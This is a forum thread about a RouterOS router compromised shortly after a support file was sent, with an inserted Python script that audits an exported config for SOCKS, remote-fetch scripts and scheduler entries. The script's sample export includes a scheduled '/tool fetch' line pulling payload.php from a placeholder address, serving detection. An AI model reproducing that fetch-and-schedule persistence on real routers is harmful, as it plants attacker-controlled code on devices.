lrl
newbie
Topic Author
Posts: 25
Joined: Sat Sep 28, 2013 10:31 am

Intrusion shortly after sending support file

Sun Jul 22, 2018 12:01 pm

Has anyone else experienced a RouterOS intrusion nearly immediately after sending support a supfile? Yesterday I sent support a support file after we'd had several kernel panic crashes, and within about 2.5 hours someone managed to log into the router using my credentials on the first attempt, using the only service/port available from the outside world. I reviewed gathered logs for the last month and there is not a single hint of anyone poking around till then.

The attacker logged in via winbox, turned on socks, created a script, and scheduled the script to download a php file from a remote server.

Considering how tightly we control our security and how that account is never used (in fact, going back to the router in question, that login has never been used since inception, as it was a backup full-access local user), I'm really quite concerned here.
Last edited by lrl on Wed Aug 08, 2018 7:04 am, edited 1 time in total.
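A defender-side check for the three changes lrl describes (SOCKS turned on, a script that fetches a remote file, and a scheduler entry that runs it), written against the text of a RouterOS `/export`. This is an added example, not code from the original post or from MikroTik; the export layout it parses, the handling of backslash line continuation, and the sample export (using the documentation address 203.0.113.10) are assumptions constructed for illustration.

```python
"""Audit a RouterOS '/export' text for post-compromise changes:
SOCKS proxy enabled, a script that fetches a remote file, and a
scheduler entry that runs such a script.  Example code, not MikroTik's."""
import re
from typing import Dict, List, Tuple

# key=value pairs; quoted values may contain spaces and '=' characters
_KV_RE = re.compile(r'([\w.-]+)=("(?:[^"\\]|\\.)*"|\S+)')
# anything a script could use to pull a remote payload
_FETCH_RE = re.compile(r'/tool\s+fetch|\burl=', re.IGNORECASE)

# Constructed sample export (not a real device); 203.0.113.10 is a
# documentation address.  The long 'add' line wraps with a trailing
# backslash, as exported config does (assumed format).
SAMPLE_EXPORT = r"""# jul/22/2018 10:15:00 by RouterOS 6.39.3
# software id = XXXX-XXXX
#
/ip socks
set enabled=yes port=1080
/ip service
set winbox port=8291
/system script
add name=update1 owner=admin policy=ftp,read,write,policy,test \
    source="/tool fetch url=http://203.0.113.10/payload.php dst-path=payload.php"
add name=backup source="/system backup save name=daily"
/system scheduler
add interval=1d name=sched1 on-event=update1 start-time=startup
"""


def parse_export(text: str) -> Dict[str, List[Dict[str, str]]]:
    """Return {section_path: [item, ...]}; each item maps key -> value
    for one 'add' or 'set' line.  Positional words (e.g. the 'winbox'
    in 'set winbox port=8291') are dropped, only key=value pairs kept."""
    sections: Dict[str, List[Dict[str, str]]] = {}
    section = ""
    buf = ""
    for raw in text.splitlines():
        line = raw.rstrip()
        if line.endswith("\\"):            # continuation: join with the next line
            buf += line[:-1].strip() + " "
            continue
        line = (buf + line.strip()) if buf else line.strip()
        buf = ""
        if not line or line.startswith("#"):
            continue
        if line.startswith("/"):           # a new section such as '/system script'
            section = line
            sections.setdefault(section, [])
            continue
        verb, _, rest = line.partition(" ")
        if verb in ("add", "set"):
            item = {"_verb": verb}
            for key, val in _KV_RE.findall(rest):
                if val.startswith('"') and val.endswith('"'):
                    val = val[1:-1].replace('\\"', '"')
                item[key] = val
            sections.setdefault(section, []).append(item)
    return sections


def audit(sections: Dict[str, List[Dict[str, str]]]) -> List[Tuple[str, str]]:
    """Return (indicator, detail) pairs for the three changes described
    in the post.  Findings are leads to investigate against a known-good
    export, not proof of compromise on their own."""
    findings: List[Tuple[str, str]] = []
    for item in sections.get("/ip socks", []):
        if item.get("enabled") == "yes":
            findings.append(("socks-enabled", f"port {item.get('port', '1080')}"))
    fetching = set()                       # names of scripts that pull remote files
    for item in sections.get("/system script", []):
        src = item.get("source", "")
        if _FETCH_RE.search(src):
            name = item.get("name", "?")
            fetching.add(name)
            findings.append(("script-fetches-remote", f"{name}: {src}"))
    for item in sections.get("/system scheduler", []):
        ev = item.get("on-event", "")
        if ev in fetching or _FETCH_RE.search(ev):
            findings.append(("scheduler-runs-fetch", f"{item.get('name', '?')} -> {ev}"))
    return findings


if __name__ == "__main__":
    for indicator, detail in audit(parse_export(SAMPLE_EXPORT)):
        print(f"{indicator:24} {detail}")
```

Run it against `/export` output saved from the device (or from a configuration backup taken during the investigation) and diff the findings against an export you trust; the script names and scheduler entries it reports are what to look at first in the router's own log.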
 
tomaskir
Trainer
Posts: 1162
Joined: Sat Sep 24, 2011 2:32 pm
Location: Slovakia

Re: Intrusion shortly after sending support file

Sun Jul 22, 2018 12:47 pm

1) What version of RouterOS was that router on?
2) Did you have Winbox open publicly on the default port?
 
nikc
Member Candidate
Posts: 208
Joined: Wed Jul 13, 2016 6:05 pm

Re: Intrusion shortly after sending support file

Sun Jul 22, 2018 4:41 pm

The implications of what's been said here are pretty huge. I trust you picked this up with support before publicly posting this?
 
vecernik87
Forum Veteran
Posts: 882
Joined: Fri Nov 10, 2017 8:19 am

Re: Intrusion shortly after sending support file

Sun Jul 22, 2018 5:19 pm

The implication is actually not that big, if you consider that there were suddenly several kernel panics out of a blue sky.
This might also be connected to someone fully utilizing system resources, causing a kernel panic, disabling some critical subsystem and allowing an attacker to gain access.
It is really unusual for kernel panics to happen just like that.
 
msatter
Forum Guru
Posts: 2897
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: Intrusion shortly after sending support file

Sun Jul 22, 2018 6:16 pm

TS did not state the version of RouterOS so it looks more like this:

viewtopic.php?f=21&t=133533

I hope that an information page about the vulnerabilities and how to solve them will be available soon.
 
lrl
newbie
Topic Author
Posts: 25
Joined: Sat Sep 28, 2013 10:31 am

Re: Intrusion shortly after sending support file

Sun Jul 22, 2018 7:37 pm

We were running a vulnerable version 6.39.3, but all ports were firewalled off and port knocking used to access winbox and that's where I'm a little freaked out. I can't figure out how those details could have gotten out there without a loss of control of the config.

There are some strange events circling this router, as our maintenance log shows it was upgraded to 6.40.8 on April 24th but the router logs don't support that.

To be clear here, I'm not blaming or trying to blame MikroTik support, but I'm concerned that there could be an e-mail-related security issue here. I'm also not 100% sure if all the details necessary for this would be in a support file.

If it's a coincidence, I'm speechless.

I'm embarrassed to say that after looking much closer I believe the kernel panics may have been related to having the CPU overclocked...
 
vecernik87
Forum Veteran
Posts: 882
Joined: Fri Nov 10, 2017 8:19 am

Re: Intrusion shortly after sending support file

Tue Jul 24, 2018 5:41 am

Hi,
I was just reading through some other report and I realized there might be a connection. His router was crashing due to insufficient memory and later he found the device compromised.
Are you 100% positive that your router was crashing due to the overclocked CPU and not due to running out of memory? Also, did you get any response from support@?
Similarity of these reports is too high to be just ignored.
 
lrl
newbie
Topic Author
Posts: 25
Joined: Sat Sep 28, 2013 10:31 am

Re: Intrusion shortly after sending support file

Tue Jul 24, 2018 10:28 am

I've reviewed all our Dude data on this router, back to inception, and there is zero evidence that anyone had access prior to that. This is a CCR1072; there's pretty much zero chance.

The reference report is what was installed on our router with the access.
 
pe1chl
Forum Guru
Posts: 10195
Joined: Mon Jun 08, 2015 12:09 pm

Re: Intrusion shortly after sending support file

Tue Jul 24, 2018 10:43 am

There are some strange events circling this router, as our maintenance log shows it was upgraded to 6.40.8 on April 24th but the router logs don't support that.
Are you running a 2-partition setup where the 6.39.2 was still in the inactive partition?
I have set up 2 partitions on all routers that support it, and normally just before upgrading I copy the active partition.
This already has saved me when an upgrade did not go as planned, as the router switches to the copied partition and continues to function.
However, it also caused an unplanned switch back to the older version when at one site the power failed, came back a few seconds, then failed again.
The router then switched to the older version because the startup was not completed.
Also, when there are intruders they could see your older version and switch to that to gain easier access.

Of course, when your support file is leaked, others can use it to gain knowledge about your router (like the port knocking setup).
This could also be caused by a compromise elsewhere in your environment, e.g. the admin's mail account having been hacked.
